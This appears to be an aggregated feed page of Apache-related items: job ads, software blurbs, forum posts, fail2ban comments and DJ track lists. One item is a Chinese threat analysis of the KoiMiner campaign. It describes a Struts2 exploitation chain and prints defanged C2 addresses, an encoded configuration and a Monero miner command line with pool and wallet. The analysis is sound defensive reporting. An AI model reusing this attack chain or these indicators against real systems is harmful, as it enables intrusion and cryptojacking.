Hola Joaquín, gracias por todos tus tutoriales son muy buenos. Mira tengo un problema con otro tema, y es que no puedo activar el teclado numérico en Ubuntu 18.04 LTS, cómo se hacer por favor. Muchas gracias.
          Data Science Solution Architect - CSRA - Chantilly, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Thu, 28 Jun 2018 22:14:43 GMT - View all Chantilly, VA jobs
          Data Science Solutions Architect - CSRA - Arlington, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Fri, 06 Jul 2018 10:19:49 GMT - View all Arlington, VA jobs
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Ascent Services Group - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ascent Services Group - Sun, 03 Jun 2018 15:34:33 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Talent Software Services - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Talent Software Services - Sat, 02 Jun 2018 03:34:20 GMT - View all De Pere, WI jobs
          Infrastructure & Application Monitoring Analyst - Ameriprise Financial - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ameriprise Financial - Fri, 23 Mar 2018 18:56:54 GMT - View all De Pere, WI jobs
          XAMPP Portable      Cache   Translate Page   Web Page Cache   
Mit „XAMPP Portable“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung. Praktisch: Diese portable Programmversion von „XAMPP“ lässt sich ohne Installation auf jedem PC oder Notebook starten, beispielsweise direkt von einem USB-Stick.
          XAMPP (Mac)      Cache   Translate Page   Web Page Cache   
Mit „XAMPP“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht Ihnen eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung.
          XAMPP      Cache   Translate Page   Web Page Cache   
Mit „XAMPP“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung.
          Importing a Public Certificate and Private into a Java Keystore      Cache   Translate Page   Web Page Cache   

This guide covers configuration of Apache Tomcat with SSL using a public certificate and private key when a .p12, .pfx, or.pem file are not available. Assuming these certificates are issued by a Certificate Authority, the aforementioned files may be able to be downloaded from the CA and more easily imported into the Java keystore. Unfortunately, […]

The post Importing a Public Certificate and Private into a Java Keystore appeared first on Shamrock Solutions LLC.


          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 10:56:19 GMT - View all Madison, WI jobs
          apache2-mod_nss-1.0.17-alt1      Cache   Translate Page   Web Page Cache   
apache2-mod_nss-1.0.17-alt1  build Stanislav Levin, 10 july 2018, 14:30

Group: System/Servers
Summary: Apache 2.0 module for implementing crypto using the Mozilla NSS crypto libraries
Changes:
- 1.0.14 -> 1.0.17
- Enable tests
- Remove dependency on net-tools (closes: #34784)
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Freelancer.com: Install self-renewing Letsencrypt SSL certificate on linux server      Cache   Translate Page   Web Page Cache   
Install a self-renewing Letsencrypt SSL certificate on a linux server associated with a domain. (Budget: $10 - $30 USD, Jobs: Apache, HTML, Linux, PHP, System Admin)
          Apache Struts2高危漏洞致企业服务器被入侵安装KoiMiner挖矿木马      Cache   Translate Page   Web Page Cache   
0×1 概述 许多企业的网站使用Apache的开源项目搭建http服务器,其中又有很大部分使用了Apache子项目Struts。但由于Apache Struts2产品代码存在较多隐患,从2007年开始Struts2就频频爆出多个高危漏洞。 从Apache官方公布的数据来看,从2007年至2018年共公布了编号S2-001至S2-056共56个漏洞,其中仅远程代码执行漏洞(Remote Code Execution)就有9个。 2017年3月被报出的S2-045(CVE-2017-5638)高危漏洞,基于Jakarta Multipart解析器执行文件上传时可能导致RCE,影响范围为Struts 2.3.5 – Struts 2.3.31,以及Struts 2.5 – Struts 2.5.10版本,持续存在被利用进行攻击的情况。 2018年4月腾讯御见威胁情报中心曾监测到黑客组织利用该漏洞批量入侵web服务器植入挖矿木马(详情见《企业未修复Apache Struts 2漏洞致Web服务器被批量入侵》一文),近期御见威胁情报中心再次监测到类似的攻击。 此次攻击中,黑客利用攻击工具WinStr045检测网络上存在漏洞的web服务器,发现存在漏洞的机器后通过远程执行各类指令进行提权、创建账户、系统信息搜集,然后将用于下载的木马mas.exe植入,进而利用mas.exe这个木马下载器从多个C&C地址下载更多木马:利用提权木马o3/o6.exe、挖矿木马netxmr4.0.exe。 由于挖矿木马netxmr解密代码后以模块名“koi”加载,因此腾讯御见威胁情报中心将其命名为KoiMiner。有意思的是,入侵者为确保自己挖矿成功,会检查系统进程中CPU资源消耗,如果CPU资源占用超过40%,就会将其结束运行,将省下来的系统资源用于挖矿。 根据代码溯源分析,腾讯御见威胁情报中心研究人员认为,本次KoiMiner系列挖矿木马可能是某些黑客论坛、地下挖矿组织交流社区里多人合作的“练习”作品。 攻击流程 注:Struts是一个基于MVC设计模式的Web应用框架,用户使用该框架可以将业务逻辑代码从表现层中清晰的分离出来,从而把重点放在业务逻辑与映射关系的配置文件上。Struts2是Struts与WebWork的结合,综合了Struts和WebWork的优点,采用拦截器的机制来处理用户的请求,使业务逻辑能与ServletAPI完全脱离开。 0×2 详细分析 0×2.1 入侵 检测目标系统是否存在S2-045漏洞 对存在漏洞的系统进行攻击 入侵工具中供选择的渗透命令 入侵时可以选择执行的命令(也可自定义),供选择的命令是Windows、linux渗透中常用的命令,包括查看系统版本信息、网络连接状态、端口开放状态以及向系统添加具有管理员权限的新用户、打开远程连接服务等操作。 通过目录查看命令确认C:\Windows\Help目录和C:\ProgramData目录是否已经植入木马,若没有则将mas.exe木马植入。植入时先创建C#代码文本mas.cs,然后使用.NET程序将其编译为可执行文件mas.exe。 首先执行命令创建mas.cs并写入用于下载的代码。 然后执行命令将mas.cs通过.NET程序编译为mas.exe。 命令中利用mas.exe下载挖矿木马netxmr4.0。 部分受攻击目标如下: 植入的mas.exe大小只有4k,存放在目录ProgramData下。从御见威胁情报中心的监控记录可以看到,mas.exe从多个C2地址下载了netxmr4.exe(挖矿木马)、o3.exe/o6.exe(提权木马)等多个木马。 0×2.2 提权 o3.exe利用MS16-032漏洞提升权限 0×2.3 Netxmr4.0 0×2.3.1 代码解密 挖矿木马Netxmr4.0使用C#编写并且使用ConfuserEx 对代码进行了加密混淆,在执行前使用自带的解密函数进行解密,然后利用C#反射机制执行解密后的模块。 被加密的代码保存在数组array2中。 调用解密函Decrypt对代码进行解密。 解密后保存在数组array3中,可以看到PE文件的标志“4D5A”。 将array3作为模块“koi”加载得到最终执行的恶意代码。 代码中各个类对应功能如下: 利用C#反射机制执行模块“koi” 0×2.3.2 争夺资源 挖矿木马在运行前,通过多个方法查找占用系统CPU较高的进程,关闭进程并隐藏其文件,从而保证自身挖矿代码运行时有充分的资源。 结束已在运行的挖矿进程。 关闭除本挖矿进程外的占用CPU处理时间超过40%的进程,并将该进程的文件设置为隐藏、任意用户拒绝访问。 结束文件版本信息中不包含“Microsoft Corporation.”的taskmgr、svchost、csrss进程,并将该进程的文件设置为隐藏、任意用户拒绝访问。 0×2.3.3 挖矿 如果挖矿木马版本不是“2010-2020”则从hxxp://50.232.75.165/更新下载挖矿木马。 存有挖矿配置文件的C2地址被加密。 解密函数通过字符重组运算+base64解密得到 hxxp://www.sufeinet.com/space-uid-97643.html 解密出地址后请求该C2页面 查找请求返回页面中“xMFOR”字符开头的字符(除去自身): NqNhbLWEgYNqNhb3J5cHJbiDQRvbml6kYu1naHQg3UtRpLW8gcMvQMr3RyYXfNwGtR1bStb7Imi0Y3A6OG8UJLy9wbK1U0829sLneS1uAN1cHBaCNRyvcnR4tdtM2bXIuYgmj3c29tOjdX5ZRMzMzMvxcUTgLXUgsiw0HNDQ4NB9UuKzNYYW8tpQ91lY2tu3f8jjNHdSDUC3mMjFBZXvjyoHJNNWUf5UdZub0ZGouCDIS1pKCZGh2U1ZqNW0nc5mNCQUTk98tRUZ0ZlCf3vUckVFiv1YkTjk0aV5qGMlAyWGSpClAZRWjckGjhC0UE1Sh15C1aXFvW0Sc74UhuQnmbSpeUyY0NjMnKTlMzJ32mKGVTHg3ZyXglJ0tIblIyChNFwZkZEiYCBxQ0xi1rOtlNlJ5bxcjQajIgLXH3GKdAgeCADncqStLWRvXF9lUbmF0ZUyVGIS1sZXG8KysZlbD0PyM6hx 解密页面中字符得到挖矿木马配置: -a cryptonight -o stratum+tcp://pool.supportxmr.com:3333 -u 44873Xameckc4wR21AdrM5fnoFHKZJSVj6cBADTgFTrEEN94jP2XfQZ74PMRiqoYHnBu2cCe32wLx7gKHnQpfFqCLb6Ryn2 -p x --donate-level=  门罗币挖矿钱包: 44873Xameckc4wR21AdrM5fnoFHKZJSVj6cBADTgFTrEEN94jP2XfQZ74PMRiqoYHnBu2cCe32wLx7gKHnQpfFqCLb6Ryn2 钱包收益情况: 在门罗币矿池地址查询该钱包,发现累计已经赚得约16个门罗币,而门罗币数量还在以每天约1个门罗币的速度持续上涨,这表明还有许多中招机器的木马未被清除。目前门罗币价格每个924元,该帐号已获得门罗币价值约15000元。 0×3 同源分析 0×3.1 多版本 从C2地址50.232.75.165获取的多个版本挖矿木马进行分析发现,木马作者从2018.5.13至2018.6.28持续对木马进行更新版本。在一共发现的4个版本代码对比来看,木马初始版本只有简单挖矿功能,而新版本中对C2地址进行加密、从云端获取挖矿配置、创建多个服务增加驻留几率,可以推测木马作者可能是在边学习边开发木马。 木马历史版本代码结构: 版本1.0编译日期2018-5-13 22:37:18 版本2.0,编译日期2018-5-19 20:51:01  版本3.0编译日期2018-5-26 10:55:02 版本4.0  编译日期2018-6-8 23:20:33 0×3.2 […]
          Re: Apache server fails with the ERROR - at MoodleWindowsInstaller-latest-35.zip      Cache   Translate Page   Web Page Cache   
by Kahraman Bulut.  

Hi Leon,

Thanks for your reply.

Yes, it does not crash, but after 5-6 seconds it keeps coming back with this message (see attachment) [OS: Windows 7 Professional SP1]

httpd.exe and mysqld.exe are running as shown in TaskManager



          (USA-CA-Lake Forest) DevOps Architect - AWS, Linux, Top Company!      Cache   Translate Page   Web Page Cache   
DevOps Architect - AWS, Linux, Top Company! DevOps Architect - AWS, Linux, Top Company! - Skills Required - AWS, Bash, RUBY, Python, Puppet, Chef, Linux, Varnish, Public Cloud We are a top wireless communications company that focuses on location, messaging, and navigation. Our solutions provide cloud-based messaging platforms for Emergency Response and telemedicine technologies. We develop secure mobile and platform solutions for operators and enterprises worldwide. If you are a DevOps Architect with experience, please read on! **What You Will Be Doing** The DevOps Architect will lead a team of DevOps Engineers to build software, tools and automation supporting daily operational support to our division. Manages a portfolio of multiple projects, set priorities with measurable objectives. **What You Need for this Position** 10 years minimum of industry experience, both as individual contributor in a systems administration/engineering, DevOps role or engineering manager 5 years minimum experience managing the development of a hosted online automation, tools and services 7+ years of scripting skills, such as but not limited to Bash, Ruby, and Python Unix/Linux, TCP/IP, networking, systems programming and administration proficiency required Experience working with server side infrastructure within a Linux environment (e.g. DNS, SSH, Apache, NGINX, Varnish, etc.) Experience with AWS (Amazon Web Services) or Public Cloud is a plus Knowledge of automation and configuration management tools such as Puppet, Chef, CFEngine, Ansible Experience with SNMP is preferred (Simple Network Management Protocol) EL certifications a plus AWS Certifications a plus Experience with common online protocols: HTTP, SSL, DNS, SNMP, DHCP, TCP Proficient service architecture skills Ability to multi-task and manage tasks with varying priorities Bachelor of Science degree in Computer Science, Computer Engineering, Information Technology or equivalent experience **What's In It for You** Competitive base salary (paid for every hour worked - opportunity to earn significantly more) Paid time off Exceptionally priced medical, vision, and dental coverage Flexible spending opportunities Tuition reimbursement / Gym reimbursement Paid life insurance Incentive stock option plan On-site company gyms So, if you are a DevOps Architect with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *DevOps Architect - AWS, Linux, Top Company!* *CA-Lake Forest* *JRJ-1466842*
          (USA-CA-San Francisco) Data Engineer Spark -      Cache   Translate Page   Web Page Cache   
Data Engineer Spark - Data Engineer Spark - - Skills Required - Hadoop, SPARK, Linux, Engineer If you are a Data Engineer Spark with experience, please read on! **Top Reasons to Work with Us** Highly reputable **What You Will Be Doing** Develop custom ETL applications using Spark in Python/Java that follow a standard architecture. Success will be defined by the ability to meet requirements/acceptance criteria, delivery on-time, number of defects, and clear documentation. Perform functional testing, end-to-end testing, performance testing, and UAT of these applications and code written by other members of the team. Proper documentation of the test cases used during QA will be important for success. Other important responsibilities include clear communication with team members as well as timely and thorough code reviews. As you grow in the role, you will have the opportunity to contribute to designing of new applications, setting/changing standards and architecture, and deciding on usage of new technologies. **What You Need for this Position** Linux - common working knowledge, including navigating through the file system and simple bash scripting Hadoop - common working knowledge, including basic idea behind HDFS and map reduce, and hadoop fs commands. Spark - how to work with RDDs and Data Frames (with emphasis on data frames) to query and perform data manipulation. Python/Java - Python would be ideal but a solid knowledge of Java is also acceptable. SQL Source Control Management Tool - We use BitBucket Experience ---------- Worked/developed in a Linux or Unix environment. Worked in AWS (particularly EMR). Has real hands-on experience developing applications or scripts for a Hadoop environment (Cloudera, Hortonworks, MapR, Apache Hadoop). By that, we mean someone who has written significant code for at least one of these Hadoop distributions. Has experience with ANSI SQL relational database (Oracle, SQL, Postgres, MySQL) **What's In It for You** Great Salary and Benefits So, if you are a Data Engineer Spark with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Engineer Spark -* *CA-San Francisco* *RC4-1466982*
          Apache corodova download a pdf to device and display locally      Cache   Translate Page   Web Page Cache   
Provide javascript that uses corodova file and file transfer plugins to download a pdf from server save it locally to device and display that pdf. Code must work on Android and IOS (Budget: $30 - $250 NZD, Jobs: Android, Javascript, Linux, Mobile App Development, PHP)
          #dancelife - zorian_akai      Cache   Translate Page   Web Page Cache   
(*_-) #repost #me #bboy #bboyworld #bboyhiphop #bboycrazy #bboying #bboys #bboyfreeze #airbaby #airbabyfreeze😙 #love #lovedance #crazydance #dancelife #dancelifestyle #dancer #dancers #dancersofinstagram #apache #bike #160 #timepass #click #location #bodhi #gaya #bihar #india 🇮🇳🇮🇳🇮🇳
          How to set up Apache Virtual Hosts on Debian 9      Cache   Translate Page   Web Page Cache   

In this tutorial, we will show you how to set up Apache virtual hosts on Debian 9.


          惊艳,Dubbo域名已改,也不再局限于Java!      Cache   Translate Page   Web Page Cache   
今天作者想去 Dubbo 官网查下相关资料,发现官方域名由 dubbo.io 直接跳转至 dubbo.apache.org 下了,然后突然回想起 Dubbo 已经在 2 月份正式进入了 Apache 孵化器这回事,也就不觉得奇怪了。 ![](http://p179cyr45.bkt.clouddn.com/18-7-9/56099502.jpg) 看这个新官网还真清新亮丽,对比之前的老官网,这次调整还真不少...
          Adam Bien: From JSF and PrimeFaces to WebComponents--A Conversation With Cagatay Civici      Cache   Translate Page   Web Page Cache   

An airhacks.fm podcast conversation with Cagatay Civici (@cagataycivici) about starting with Java, interfaces and return statements, IBM RAD JSF, Sun JSF Woodstock, Apache MyFaces, Apache MyFaces Tomahawk, JSF Chart Creator, Apache MyFaces Tobago, Oracle's ADF, YUI, jQuery and JSF, the non-dependency mindset, building complex UI components, Jakarta EE and microprofile, a scientific approach to design, choosing colors and color palletes, ideas for themes, standards and PrimeFaces, keeping up with Angular, React and WebComponents, StencilJS, PrimeFaces NG, an opensource model with commercial support, why "Prime", component sponsorship, performance under pressure and PrimeTek.

Subscribe to airhacks.fm podcast via: RSS iTunes

See you at Effective Progressive-, Offline-, Single Page-, Desktop Apps with Web Standards -- the "no frameworks, no migrations" approach, at Munich Airport, Terminal 2 or webcomponents.training (online).
Real World Java EE Workshops [Airport Munich]>


          How to set up Apache Virtual Hosts on Debian 9      Cache   Translate Page   Web Page Cache   

In this tutorial, we will show you how to set up Apache virtual hosts on Debian 9.


          Comment on How To: Stop Apache DOS attacks with Fail2Ban by ekoariirawan      Cache   Translate Page   Web Page Cache   
please help me, i have implementation of ssh, ftp, http authentication and everything is working. but for http-get-dos configrations can not, ip address is not blocked and there is already a log file in /var/log/apache/access.log. this is my jail.local config [http-get-dos] enabled = true port = http, https filter = http-get-dos logpath = /var/log/apache2/error.log maxretry = 300 findtime = 300 bantime = 300 action = iptables [name = HTTP, port = http, protocol = tcp] failregex on /etc/fail2ban/filter.d/http-get-dos.cof failregex = ^ -. * "(GET | POST). * my implementation on vmware using ubuntu version 14.04. . thank you, your help I hope so much. .
          Comment on How To: Stop Apache DOS attacks with Fail2Ban by ekoariirawan      Cache   Translate Page   Web Page Cache   
please help me, i have implementation of ssh, ftp, http authentication and everything is working. but for http-get-dos configrations can not, ip address is not blocked and there is already a log file in /var/log/apache/access.log. this is my jail.local config [http-get-dos] enabled = true port = http, https filter = http-get-dos logpath = / var / log / apache2 / YOUR_WEB_SERVER_ACCESS_LOG # maxretry is how many GETs we can have in the findtime period before getting narky maxretry = 300 # findtime is the time period in seconds in which we're counting "retries" (300 seconds = 5 mins) findtime = 300 # bantime is how long we should drop incoming GET requests for a given IP for, in this case it's 5 minutes bantime = 300 action = iptables [name = HTTP, port = http, protocol = tcp] [http-get-dos] enabled = true port = http, https filter = http-get-dos logpath = /var/log/apache2/error.log maxretry = 300 findtime = 300 bantime = 300 action = iptables [name = HTTP, port = http, protocol = tcp] failregex on /etc/fail2ban/filter.d/http-get-dos.cof failregex = ^ -. * "(GET | POST). * my implementation on vmware using ubuntu version 14.04. . thank you, your help I hope so much. .
          Comment on How To: Stop Apache DOS attacks with Fail2Ban by r3dux      Cache   Translate Page   Web Page Cache   
Hmm... Is your webserver logging get requests? That is, is the logging level of the server sufficiently verbose? If it's only logging errors or such then it won't see the 'get' messages that fail2ban parses to put the temporary ban in place. Alternatively, is your site running HTTPS (typically port 443)? This setup is just for straight HTTP (port 80) and I haven't tried it with https, despite moving this site to use https. It's likely you'd have to modify the last line of the <b>jail.local</b> file to make sure it's looking for the right thing.
          Van contra morenistas en Puebla      Cache   Translate Page   Web Page Cache   
Por irrumpir en hotel donde morenistas acusaron 'mapachera' de PAN, Fiscalía de Puebla giró orden de captura contra líder local del partido.
          CLUBcast 193      Cache   Translate Page   Web Page Cache   

CLUBcast is your home for the latest & greatest in Electronic Dance Music.

Mixed by Envisional

Twitter: @iamenvisional

Track List:

Birdy – Wild Horses (Sam Feldt Remix)

Alessia Cara & G-Eazy – Wild Things (Young Bombs Remix)

Cash Cash Feat. Sofia Reyes – How To Love (Boombox Cartel Remix)

Calvin Harris Feat. Rihanna – This Is What You Came For (Holl & Rush Bootleg)

Kill The Buzz Feat. Katt Niall – Galaxies

Mambo Brothers – Momento

Blinders – You Don’t Know

DBSTF – AFREAKA

Aylen – ZaZu

Timmy Trumpet & Angemi – Callab Bro

DJ Snake Feat. Bipolar Sunshine – Middle (MORTEN Remix)

Michael Mind – Don’t Stop The Rhythm (DJ Kuba & Neitan Remix)

Bassjackers – Fuck (Dimitri Vegas & Like Mike Edit)

Bojac – Six Million

TJR & Cardi B – Fuck Me Up

Burns – Run Things

Vicetone – Hawt Stuff

Dirty Ducks – Apache

Global Deejays & Danny Marquez Feat. Puppah Nas-T & Denise – Work (Nari & Milani Remix)

Dirty Rush & Gregor Es – Titans

Kaaze – Milk Man

Maddix & Jayden Jaxx – Voltage

Michael Mind – Booty Bounce

MOTi – Louder

NERVO & Nicky Romero – Let It Go (Kryder Remix)

 

 


          CLUBcast 167      Cache   Translate Page   Web Page Cache   

CLUBcast is your home for the Latest & Greatest Electronic Dance Music.

 

Mixed & Hosted by Envisional

 

1. Justin Bieber – What Do You Mean (2kool Remix)

2. Cazzette & Newtimers – Together (Lost Kings Remix)

3. Thomas Newson – Summer Vibes

4. Kryder & Dave Winnel – Apache

5. Deorro & Dirty Audio Feat. Miss Palmer – Without Love

6. Matisse & Sadko vs. Vigel – Tengu 

7. Tritonal – Gamma Gamma (J-Trick Remix) 

8. Goja – Gradient

9. Futuristic Polar Bears – Night Vision

10. Dzeko & Torres Feat. Delaney Jane – L’Amour Toujours (Tiesto Edit)

11. Garmiani & Sanjin – Jump & Sweat

12. Thomas Gold & Uberdrop – Souq

13.Azulae & Dropkillers – Game Over

14. Thomas Newson & Marco V Feat. Rumors – Together

15. James Egbert & Taylr Renee – Can’t Stay Here

16. Tujamo & Danny Avila – Cream

17. Galantis & GTA vs. Conro & Bali Bandits – Peanut Butter Nosehorn (Ronium & Wand England Mashup)

18. NewID & First Day Feat. IVAR – Show Me

19. Jebu – Consequences

 
Twitter.com/CLUBcastpodcast
Twitter.com/IAmEnvisional
Facebook.com/CLUBcastpodcast
Facebook.com/IAmEnvisional

          CLUBcast 165      Cache   Translate Page   Web Page Cache   
CLUBcast is your home for the latest & greatest Electronic Dance Music.
 
Hosted & Mixed by MP
 
TRACK LIST:
 
1. Jack Novak Ft. Blackbear - If It Kills Me
2. Axwell ^ Ingrosso - Sun Is Shining (W&W Remix)
3. Arston Ft. Jake Reese - Circle Track (Tom Fall Remix)
4. Dash Berlin Ft. Jonathan Mendelsohn - World Falls Apart (Thomas Gold Remix)
5. Lakros - Trinity
6. Yellow Claw & Dirtcaps - Smoke It
7. Julian Jordan - Lost Words
8. Aftershock - ID
9. Azulae & Dropkillers - Game Over
10. Conro & Bali Bandits - Nosehorn
11. Tritonal - Anchor (Simon & Phil Remix)
12. Jochen Miller Ft. Simone Nijssen - Slow Down
13. Quintino - Devotion
14. Kryder & Dave Winnel - Apache
 
UPCOMING EVENTS: 
-Sept. 4. MP @ Magic Kingdom 2:
https://www.facebook.com/events/1611899695735679/
 
-Oct. 24. MP @ Electronic Music Universe
http://www.electronicmusicuniverse.com
 
 
SOCIAL MEDIA:
https://www.facebook.com/CLUBcastpodcast
https://www.facebook.com/CLUBcastMP
https://www.twitter.com/CLUBcastpodcast
https://www.twitter.com/CLUBcastMP

          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Re: PHP - Ubuntu 18.04: maximum upload limit is always 10Mo      Cache   Translate Page   Web Page Cache   
by Zied ALAYA.  

thanks for the hint but did not solve my issue. I changed upload_max_filesize = 60M ,   post_max_size = 240M  in all php.ini files and still have the same message "The file 'file_name' is too large and cannot be uploaded".

$ sudo find -iname php.ini
./etc/php/7.0/apache2/php.ini
./etc/php/7.2/apache2/php.ini
./etc/php/7.2/cgi/php.ini
./etc/php/7.2/cli/php.ini


          DNS Server Configuration      Cache   Translate Page   Web Page Cache   
Configure the GoDaddy Domain Name with DNS Configuration by adding records, with forwarding Disabled Got the website running in Apache Tomcat in private Synology NAS Like http://<PrivateIP>:Port/Directory Budget: Rs... (Budget: ₹1500 - ₹12500 INR, Jobs: DNS, Linux, System Admin, Web Hosting)
          Linux System Administrator - Earth Resources Technology, Inc - Seattle, WA      Cache   Translate Page   Web Page Cache   
Apache webserver, Tomcat, BIND, Nagios and Nagvis, Snort, Gitlab, openDCIM, R-cran, ColdFusion, and Commonspot....
From Earth Resources Technology, Inc - Tue, 13 Mar 2018 19:23:29 GMT - View all Seattle, WA jobs
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Multi Site and https in Drupal8 - getting redirect to install.php      Cache   Translate Page   Web Page Cache   

I am trying to move my system to https, but Drupal doesn't seem to recognize my existing installation when using https instead of http. So I end up at install.php.

I have two entries for VirtualHost in the apache config.

<VirtualHost *:80>

<VirtualHost *:443>

They are identical besides the SSL directives. Especially ServerName and ServerAlias are the same.

sites.php contains:

<?php

$sites["www.goldgemaeuer.de"] = "goldgemaeuer";
$sites["goldgemaeuer.de"] = "goldgemaeuer";

$sites["443.goldgemaeuer.de"] = "goldgemaeuer";
$sites["443.www.goldgemaeuer.de"] = "goldgemaeuer";

With "goldgemaeuer" being a directory below "sites". But the directory seems to be ignored when using https. And I didn't find the configuration problem.

Any help is highly appreciated.

Werner

Drupal version: 

          Desarrollador Java Full-Stack - STEL Solutions - Murcia, España      Cache   Translate Page   Web Page Cache   
Buscamos talento para incorporarse al equipo de desarrollo del producto estrella de la compañía. Se trata de STEL Order (www.stelorder.com), el software de gestión y facturación en la nube y en el móvil mejor valorado. Requisitos: Experiencia desarrollando sistemas de back-end con Java J2EE y Apache Tomcat. Experiencia trabajando con servidores de base de datos (MySQL y JPA) Experiencia desarrollando front-end para aplicaciones web (HTML, CSS, JavaScript, JQuery y AJAX). ...
          ASTPP Installation and Configration      Cache   Translate Page   Web Page Cache   
ASTPP installation and configuration need such as below task: 1. Install ASTPP 2. Security: a. Apache Authentication b. Secure Freeswitch c. Secure Portal d. Fail2ban. 3. Install letsencrypt Optional,... (Budget: $20 - $30 USD, Jobs: Apache, Asterisk PBX, Linux, PHP, VoIP)
          Neatly bypassing CSP – Wallarm      Cache   Translate Page   Web Page Cache   

